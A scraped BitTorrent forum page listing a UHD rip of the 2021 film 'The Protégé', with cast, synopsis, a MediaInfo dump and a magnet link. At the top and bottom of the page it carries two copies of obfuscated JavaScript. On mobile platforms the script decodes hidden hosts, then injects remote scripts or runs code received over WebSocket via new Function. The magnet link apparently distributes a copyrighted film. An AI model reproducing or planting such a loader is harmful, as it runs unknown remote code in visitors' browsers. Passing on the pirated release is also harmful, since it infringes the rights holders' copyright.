门徒[简繁字幕].The.Protege.2021.UHD.BluRay.2160p.TrueHD.Atmos.7.1.x265.10bit.HDR 16.51GB

版主小s 1月前 230

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x68\x6e\x49\x43\x61\x57\x73\x53\x72\x45']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};

◎译 名 门徒 / 复仇杀姬(港) / 有价之人 / 资产 / The Protege / The Asset / 刺客密令(台)

◎片 名 The Protégé

◎年 代 2021

◎产 地 美国

◎类 别 动作 / 惊悚 / 犯罪

◎语 言 英语

◎上映日期 2021-08-20(美国)

◎IMDb链接 https://www.imdb.com/title/tt6079772/

◎豆瓣评分 5.7/10 (3213人评价)

◎豆瓣链接 https://movie.douban.com/subject/34881663/

◎片 长 109分钟

◎导 演 马丁·坎贝尔 Martin Campbell (id:1040630)

◎编 剧 理查德·温克 Richard Wenk (id:1300710)

◎演 员 李美琪 Maggie Q (id:1019013)

迈克尔·基顿 Michael Keaton (id:1049486)

塞缪尔·杰克逊 Samuel L. Jackson (id:1054408)

大卫·瑞托 David Rintoul (id:1140400)

帕特里克·麦拉海德 Patrick Malahide (id:1000395)

雷·费隆 Ray Fearon (id:1356551)

奥利·普费弗 Ori Pfeffer (id:1395525)

罗伯特·帕特里克 Robert Patrick (id:1041135)

小弗洛林·皮尔斯齐 Florin Piersic Jr. (id:1009845)

杜铎·奇里拉 Tudor Chirila (id:1019648)

沃利扎·比尼夫 Velizar Binev (id:1067224)

乔治·皮斯特拉努 George Pistereanu (id:1367289)

伊娃·努金·索森 Eva Nugyen Thorsen (id:1461038)

亚历克斯·博尔达 Alex Bordea (id:1461039)

塔尼娅·凯勒 Tanja Keller (id:1461040)

塔伊·阿特沃尔 Taj Atwal (id:1416986)

卡罗琳·朗奎 Caroline Loncq (id:1397697)

丽琪达·卡里 Richenda Carey (id:1342624)

大卫·斯特恩 David Sterne (id:1313115)

杰克·德格斯 Jack Derges (id:1350882)

唐·迈克尔·保罗 Don Michael Paul (id:1000599)

亚瑟·萨克里安 Arthur M. Sarkissian (id:1383164)

Moshe Diamant Moshe Diamant (id:1426014)

Robert Van Norden Robert Van Norden (id:1426015)

◎标 签 动作 / 杀手 / 美国 / 犯罪 / 2021 / 女性 / 惊悚 / 剧情

◎简 介

故事围绕伦勃朗(基顿饰)和安娜(李美琪饰)展开,这两个世界上最顶级的杀手将揭露一段发生在越南的神秘往事。多年来,他们游遍全球来互相争夺最抢手的合同。但当安娜的导师穆迪(杰克逊饰)被谋杀时,她和伦勃朗必须结盟,返回越南追捕凶手。

  1. ##### MediaInfo ######

  2. General

  3. Unique ID : 234100605647810492896358455658053436905 (0xB01E22FAF226A7526C58A386518105E9)

  4. Complete name : The.Prot[email protected]BBQDDQ.COM.mkv

  5. Format : Matroska

  6. Format version : Version 4

  7. File size : 16.5 GiB

  8. Duration : 1 h 48 min

  9. Overall bit rate mode : Variable

  10. Overall bit rate : 21.7 Mb/s

  11. Encoded date : UTC 2021-10-20 03:18:57

  12. Writing application : mkvmerge v49.0.0 ('Sick Of Losing Soulmates') 64-bit

  13. Writing library : libebml v1.4.0 + libmatroska v1.6.1


  14. Video

  15. ID : 1

  16. Format : HEVC

  17. Format/Info : High Efficiency Video Coding

  18. Format profile : Main [email protected]@High

  19. HDR format : SMPTE ST 2086, HDR10 compatible

  20. Codec ID : V_MPEGH/ISO/HEVC

  21. Duration : 1 h 48 min

  22. Bit rate : 16.4 Mb/s

  23. Width : 3 840 pixels

  24. Height : 1 608 pixels

  25. Display aspect ratio : 2.40:1

  26. Frame rate mode : Constant

  27. Frame rate : 23.976 (24000/1001/53354) FPS

  28. Color space : YUV

  29. Chroma subsampling : 4:2:0 (Type 2)

  30. Bit depth : 10 bits

  31. Bits/(Pixel*Frame) : 0.111

  32. Stream size : 12.5 GiB (76%)

  33. Title : HEVC, [email protected]@High, 24/1.001 fps @ 16443 kbps

  34. Writing library : x265 3.4+14-gd419c7152:[Windows][GCC 10.2.0][64 bit] 10bit

  35. Encoding settings : cpuid=533541111039 / frame-threads=4 / numa-pools=20 / wpp / pmode / pme / no-psnr / no-ssim / log-level=2 / input-csp=1 / input-res=3840x1608 / interlace=0 / total-frames=156630 / level-idc=51 / high-tier=1 / uhd-bd=0 / ref=4 / no-allow-non-conformance / repeat-headers / annexb / no-aud / hrd / info / hash=0 / no-temporal-layers / no-open-gop / min-keyint=24 / keyint=240 / gop-lookahead=0 / bframes=8 / b-adapt=2 / b-pyramid / bframe-bias=0 / rc-lookahead=25 / lookahead-slices=0 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / hist-scenecut=0 / radl=0 / no-splice / no-intra-refresh / ctu=64 / min-cu-size=8 / no-rect / no-amp / max-tu-size=32 / tu-inter-depth=3 / tu-intra-depth=3 / limit-tu=4 / rdoq-level=2 / dynamic-rd=0.00 / no-ssim-rd / signhide / no-tskip / nr-intra=0 / nr-inter=0 / no-constrained-intra / no-strong-intra-smoothing / max-merge=4 / limit-refs=1 / limit-modes / me=3 / subme=4 / merange=25 / temporal-mvp / no-frame-dup / no-hme / weightp / weightb / no-analyze-src-pics / deblock=-3:-3 / no-sao / no-sao-non-deblock / rd=6 / selective-sao=0 / no-early-skip / rskip / no-fast-intra / no-tskip-fast / no-cu-lossless / b-intra / no-splitrd-skip / rdpenalty=0 / psy-rd=2.00 / psy-rdoq=1.00 / no-rd-refine / no-lossless / cbqpoffs=0 / crqpoffs=0 / rc=crf / crf=17.0 / qcomp=0.65 / qpstep=4 / stats-write=0 / stats-read=0 / vbv-maxrate=160000 / vbv-bufsize=160000 / vbv-init=0.9 / crf-max=0.0 / crf-min=0.0 / ipratio=1.30 / pbratio=1.20 / aq-mode=3 / aq-strength=0.85 / cutree / zone-count=0 / no-strict-cbr / qg-size=32 / no-rc-grain / qpmax=69 / qpmin=0 / no-const-vbv / sar=1 / overscan=0 / videoformat=5 / range=0 / colorprim=9 / transfer=16 / colormatrix=9 / chromaloc=1 / chromaloc-top=2 / chromaloc-bottom=2 / display-window=0 / master-display=G(13250,34500)B(7500,3000)R(34000,16000)WP(15635,16450)L(10000000,10) / cll=1000,932 / min-luma=0 / max-luma=1023 / log2-max-poc-lsb=8 / vui-timing-info / vui-hrd-info / slices=1 / no-opt-qp-pps / no-opt-ref-list-length-pps / no-multi-pass-opt-rps / scenecut-bias=0.05 / hist-threshold=0.03 / no-opt-cu-delta-qp / no-aq-motion / hdr10 / hdr10-opt / no-dhdr10-opt / no-idr-recovery-sei / analysis-reuse-level=0 / analysis-save-reuse-level=0 / analysis-load-reuse-level=0 / scale-factor=0 / refine-intra=0 / refine-inter=0 / refine-mv=1 / refine-ctu-distortion=0 / no-limit-sao / ctu-info=0 / no-lowpass-dct / refine-analysis-type=0 / copy-pic=1 / max-ausize-factor=1.0 / no-dynamic-refine / no-single-sei / no-hevc-aq / no-svt / no-field / qp-adaptation-range=1.00 / no-scenecut-aware-qpconformance-window-offsets / right=0 / bottom=0 / NTMzNTQ= / decoder-max-rate=0

  36. Language : English

  37. Default : Yes

  38. Forced : No

  39. Color range : Limited

  40. Color primaries : BT.2020

  41. Transfer characteristics : PQ

  42. Matrix coefficients : BT.2020 non-constant

  43. Mastering display color primaries : Display P3

  44. Mastering display luminance : min: 0.0010 cd/m2, max: 1000 cd/m2

  45. Maximum Content Light Level : 1000 cd/m2

  46. Maximum Frame-Average Light Level : 932 cd/m2


  47. Audio #1

  48. ID : 2

  49. Format : MLP FBA 16-ch

  50. Format/Info : Meridian Lossless Packing FBA with 16-channel presentation

  51. Commercial name : Dolby TrueHD with Dolby Atmos

  52. Codec ID : A_TRUEHD

  53. Duration : 1 h 48 min

  54. Bit rate mode : Variable

  55. Bit rate : 4 233 kb/s

  56. Maximum bit rate : 8 016 kb/s

  57. Channel(s) : 8 channels

  58. Channel layout : L R C LFE Ls Rs Lb Rb

  59. Sampling rate : 48.0 kHz

  60. Frame rate : 1 200.000 FPS (40 SPF)

  61. Compression mode : Lossless

  62. Delay relative to video : 1 ms

  63. Stream size : 3.22 GiB (19%)

  64. Title : English Dolby TrueHD 7.1 (Atmos) @ 4872 kbps

  65. Language : English

  66. Default : Yes

  67. Forced : No

  68. Number of dynamic objects : 11

  69. Bed channel count : 1 channel

  70. Bed channel configuration : LFE


  71. Audio #2

  72. ID : 3

  73. Format : AC-3

  74. Format/Info : Audio Coding 3

  75. Commercial name : Dolby Digital

  76. Codec ID : A_AC3

  77. Duration : 1 h 48 min

  78. Bit rate mode : Constant

  79. Bit rate : 640 kb/s

  80. Channel(s) : 6 channels

  81. Channel layout : L R C LFE Ls Rs

  82. Sampling rate : 48.0 kHz

  83. Frame rate : 31.250 FPS (1536 SPF)

  84. Compression mode : Lossy

  85. Delay relative to video : 8 ms

  86. Stream size : 498 MiB (3%)

  87. Title : English Dolby 5.1-EX 5.1 @ 640 kbps

  88. Language : English

  89. Service kind : Complete Main

  90. Default : No

  91. Forced : No


  92. Audio #3

  93. ID : 4

  94. Format : AC-3

  95. Format/Info : Audio Coding 3

  96. Commercial name : Dolby Digital

  97. Codec ID : A_AC3

  98. Duration : 1 h 48 min

  99. Bit rate mode : Constant

  100. Bit rate : 192 kb/s

  101. Channel(s) : 2 channels

  102. Channel layout : L R

  103. Sampling rate : 48.0 kHz

  104. Frame rate : 31.250 FPS (1536 SPF)

  105. Compression mode : Lossy

  106. Stream size : 150 MiB (1%)

  107. Title : English Dolby Digital Audio 2.0 @ 192 kbps Commentary

  108. Language : English

  109. Service kind : Complete Main

  110. Default : No

  111. Forced : No


  112. Text #1

  113. ID : 5

  114. Format : PGS

  115. Codec ID : S_HDMV/PGS

  116. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  117. Duration : 1 h 39 min

  118. Bit rate : 29.1 kb/s

  119. Count of elements : 1950

  120. Stream size : 20.7 MiB (0%)

  121. Title : Eng/SUP

  122. Language : English

  123. Default : No

  124. Forced : No


  125. Text #2

  126. ID : 6

  127. Format : PGS

  128. Codec ID : S_HDMV/PGS

  129. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  130. Duration : 1 h 38 min

  131. Bit rate : 22.8 kb/s

  132. Count of elements : 1547

  133. Stream size : 16.2 MiB (0%)

  134. Title : Chs/SUP 简体

  135. Language : Chinese

  136. Default : Yes

  137. Forced : No


  138. Text #3

  139. ID : 7

  140. Format : PGS

  141. Codec ID : S_HDMV/PGS

  142. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  143. Duration : 1 h 38 min

  144. Bit rate : 23.7 kb/s

  145. Count of elements : 1547

  146. Stream size : 16.8 MiB (0%)

  147. Title : Cht/SUP 繁体

  148. Language : Chinese

  149. Default : No

  150. Forced : No


  151. Text #4

  152. ID : 8

  153. Format : PGS

  154. Codec ID : S_HDMV/PGS

  155. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  156. Duration : 1 h 38 min

  157. Bit rate : 36.6 kb/s

  158. Count of elements : 1547

  159. Stream size : 25.9 MiB (0%)

  160. Title : Chs/SUP 简英双语

  161. Language : Chinese

  162. Default : No

  163. Forced : No


  164. Text #5

  165. ID : 9

  166. Format : PGS

  167. Codec ID : S_HDMV/PGS

  168. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  169. Duration : 1 h 38 min

  170. Bit rate : 37.4 kb/s

  171. Count of elements : 1547

  172. Stream size : 26.5 MiB (0%)

  173. Title : Cht/SUP 繁英双语

  174. Language : Chinese

  175. Default : No

  176. Forced : No


  177. Menu

  178. 00:00:00.000 : en:第 01 章

  179. 00:03:42.848 : en:第 02 章

  180. 00:11:16.301 : en:第 03 章

  181. 00:20:44.285 : en:第 04 章

  182. 00:25:32.489 : en:第 05 章

  183. 00:31:32.474 : en:第 06 章

  184. 00:37:53.771 : en:第 07 章

  185. 00:46:41.632 : en:第 08 章

  186. 00:51:49.315 : en:第 09 章

  187. 00:54:49.620 : en:第 10 章

  188. 00:59:55.926 : en:第 11 章

  189. 01:05:41.271 : en:第 12 章

  190. 01:12:48.739 : en:第 13 章

  191. 01:18:25.993 : en:第 14 章

  192. 01:25:31.293 : en:第 15 章

  193. 01:34:57.817 : en:第 16 章


TAGS 动作 惊悚 犯罪

磁力链:
  • magnet:?xt=urn:btih:06CAE1983732AF6E8E22CF9B935180B5BE3F0E10

上传的附件:
BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。
最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
发新帖
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNg==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x59\x72\x72\x51\x4e\x72\x4a\x5a\x7a\x42']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};